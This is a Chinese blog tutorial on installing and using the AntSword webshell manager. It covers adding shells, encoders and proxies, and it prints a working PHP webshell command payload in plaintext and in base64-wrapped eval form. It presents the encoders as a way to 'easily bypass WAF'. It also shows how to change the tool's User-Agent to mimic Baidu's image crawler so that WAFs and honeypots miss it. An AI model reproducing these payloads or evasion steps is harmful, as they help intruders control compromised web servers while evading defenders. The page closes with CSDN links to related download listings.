中国蚁剑的下载、安装与使用

最新推荐文章于 2024-07-27 17:04:42 发布
最新推荐文章于 2024-07-27 17:04:42 发布
阅读量3.2k 收藏 12
点赞数 2
分类专栏: CyberSecurity
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Waffle666/article/details/111933776
版权

一、中国蚁剑下载、安装

在这里插入图片描述

百度网盘链接:https://pan.baidu.com/s/1Fl0_hFtCtfUgcNIOwKeGEA
提取码:nvjc

共包含2个文件:
antSword.zip
AntSword-Loader-v4.0.3-win32-x64.zip

由于我下载的是“AntSword-Loader-v4.0.3-win32-x64.zip”,我就以Windows版本64位来示例了。

1、我们解压“AntSword-Loader-v4.0.3-win32-x64.zip”后,双击“AntSword.exe”;
在这里插入图片描述

第一次安装项目需要先初始化,如果你已经下载了核心源码,就选择项目源码的文件夹。(如果只下载了加载器,选择一个空文件夹,加载器会自动帮你下载核心项目源码)。

注意:这个项目文件夹就是你以后需要备份的,存储着你的shell和shell内的资料。

2、等初始化完成后,再双击“AntSword.exe”即可正常启动!
在这里插入图片描述

二、蚁剑的使用

1、添加一个shell

首先:右键单击 - 添加数据;
在这里插入图片描述其次:输入URL地址,连接密码以及编码设置。PHP语言推荐编辑器使用chr加密;
在这里插入图片描述再次:如果需要自己写编码器的加密类型,可以按下图来操作:
在这里插入图片描述还可以配置shell的请求信息和post内容;

在这里插入图片描述最后:还可以配置全局代理;
在这里插入图片描述

在这里插入图片描述

2、插件

中国蚁剑有一个插件市场(ctrl+shift+p),可以安装一些插件,插件有很多。以下是部份插件截图:
在这里插入图片描述

3、关于编码器

编码器是这个程序的过人之处,用编码器加密可以轻松绕过WAF。

不妨,我们来对比一下默认不使用编码传输和base64编码传输的区别:
base64编码
在这里插入图片描述
明文传输,post内容为:

ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}    ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.="    ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.="    {$s}";echo $R;;echo "8e51f";die();

base64加密传输,post内容为:

_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));

注意:其中,ant参数名称是shell密码。

再来看看chr编码传输,完全就全部编码了。
在这里插入图片描述

4、user-agent修改

要注意的是,软件默认的user-agent是:User-Agent: antSword/v2.0;而且大部分人都不会去自定义useragent,这就给waf和蜜罐白白送了一个特征,所以我们要修改一下源代码:

修改项目路径:

antSword\modules\request.js (修改const USER_AGENT = ‘antSword/v2.1’; 这一行代码!)

antSword\modules\update.js (有两处要修改;可搜索“antSword/v2.0”来找到这两行代码!)

我这里是把antSword/v2.0或antSword/v2.1修改为了Baiduspider-image,我改成了百度图片蜘蛛;
如果大家还有什么不懂的,请查看中文说明书:https://doc.u0u.us/zh-hans/

参考博文:https://www.fujieace.com/hacker/tools/antsword.html

Wαff1ε
关注
专栏目录
中国蚁剑AntSword-v1.1.2-win32-x64
03-21
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员
中国蚁剑下载使用(关于upload靶场)后续更新upload过关
m0_74540090的博客
04-23 2339
文件名:antSword.zip链接:提取码:8888下载以后解压,比如放在。
中国蚁剑(antSword)下载安装安装出现的问题
最新发布
ZzzzZ123486的博客
07-27 555
可能是杀毒软件杀掉了,关闭杀毒软件后以管理员身份打开即可解决。2.解压完成后,进入文件中,点击exe文件进行安装。1.代码解压出错:[object Object]进入网站后可自行选择版本下载。1.下载zip文件后进行解压。
中国蚁剑下载以及安装教程
m0_70787202的博客
03-17 7512
中国蚁剑下载以及安装
中国蚁剑(antSword)下载安装安装出现的问题、使用教程
热门推荐
a770067334的博客
11-27 1万+
中国蚁剑(antSword)下载安装安装出现的问题、使用教程
中国蚁剑下载安装以及插件的安装教程
m0_70787202的博客
03-23 6951
中国蚁剑下载 中国蚁剑安装 中国蚁剑插件的安装
中国蚁剑免费下载(这里是win版)
bjml_的博客
11-04 652
中国蚁剑安装
中国蚁剑下载安装包 保证正版
12-23
这是我上传的中国蚁剑下载安装包,它是一款功能强大的网络安全工具,可以帮助您检测和防御各种网络威胁。中国蚁剑具有以下特点: 1.全面检测:中国蚁剑可以对您的网络环境进行全面检测,及时发现潜在的安全风险和...
中国蚁剑源码antSword-2.1.9.zip
09-17
中国蚁剑(AntSword)是一款开源的安全工具,主要用于网络安全测试和Web应用的渗透测试。在本案例中,我们讨论的是其2.1.9版本的源码。这个压缩包"antSword-2.1.9.zip"包含了蚁剑项目在该版本的所有源代码,用户可以...
中国蚁剑AntSword
04-07
中国蚁剑,又称AntSword,是一款开源的网络渗透测试工具,主要应用于CTF(Capture The Flag)竞赛和网络安全领域的安全测试与分析。这款工具以其简单易用、功能丰富的特性深受安全研究人员和爱好者喜爱。在本文中,...
中国蚁剑2.1.9_内含源码和加载器.rar
11-19
中国蚁剑是一款开源的Web渗透测试工具,以其高效、便捷的操作方式受到许多网络安全专业人士的青睐。版本2.1.9是该工具的一个迭代更新,它提供了更多的功能和优化,以帮助用户更好地进行网站的安全测试。加载器v4.0.3...
蚁剑AntSword-Loader-v4.0.3-win32-x64
05-29
中国蚁剑是一款跨平台且十分优秀的开源网站管理工具,面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。它集文件管理、虚拟终端、数据管理功能于一身,可在windows、linux和Mac上正常运行。 内置antSword-master文件无需二次下载,直接选择antSword-master就可启动
中国蚁剑完整版,包含linux和windows版本
07-18
完整版antsword,包含linux和windows版本,插件市场可用 。安全人员测试利器
中国蚁剑antSword
04-27
正版中国蚁剑,黑客控制网站必备工具,解压后配置文件就可以用了
中国蚁剑,AntSword-Loader-v4.0.3-win32-x64和antSword-master
09-07
含AntSword-Loader-v4.0.3-win32-x64和antSword-master 。下载即用。
网安工具系列:中国蚁剑安装和入门
01-05
本教程将详细讲解如何安装和入门使用中国蚁剑。 首先,我们来看安装过程。安装中国蚁剑之前,我们需要确保电脑上已经安装了必要的环境。这里提供的`7z2301-x64.exe`是一个7-Zip的压缩软件,它是解压`AntSword-...
中国蚁剑下载安装教程
m0_52051132的博客
09-17 2633
解压压缩包, 为主程序 AntSword.exe 创建快捷方式。双击 AntSword.exe 启动主程序,第一次启动需要设置工作目录。链接: https://pan.baidu.com/s/1wRmj_cB1sLkJ_npRCYO8Xw。链接:https://pan.baidu.com/s/1TJBQ01JWLHUXLO-j2_GVfg。文件名 :AntSword- Loader-v4.0.3-win32-x64。文件名:antSword.zip。2 、 下载加载器。提取码: 8888。
蚁剑下载安装(AntSword-Loader-v4.0.3-win32-x64和antSword-2.1.15)
ljmlh1219的博客
11-17 1万+
蚁剑下载安装
【简单工具】中国蚁剑V2.0下载安装到上手
Fighting_hawk的博客
02-26 1万+
1. 了解蚁剑的安装过程; 2. 了解蚁剑的功能; 3. 掌握蚁剑的基本使用方法。
kali linux安装中国蚁剑
03-16
抱歉,我是AI语言模型,无法在本地安装软件。但是,您可以在Kali Linux上安装中国蚁剑,具体步骤如下: 1. 下载中国蚁剑的Linux版本,可以从官方网站或者Github上下载。 2. 解压下载的文件,可以使用命令tar -zxvf antSword_linux_x64.tar.gz进行解压。 3. 进入解压后的文件夹,可以使用cd antSword_linux_x64命令进入。 4. 执行./antSword命令启动中国蚁剑。 5. 如果启动失败,可以使用命令chmod +x antSword对文件进行授权。 6. 启动成功后,可以在浏览器中输入http://127...1:808/访问中国蚁剑。 希望这些步骤对您有所帮助。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值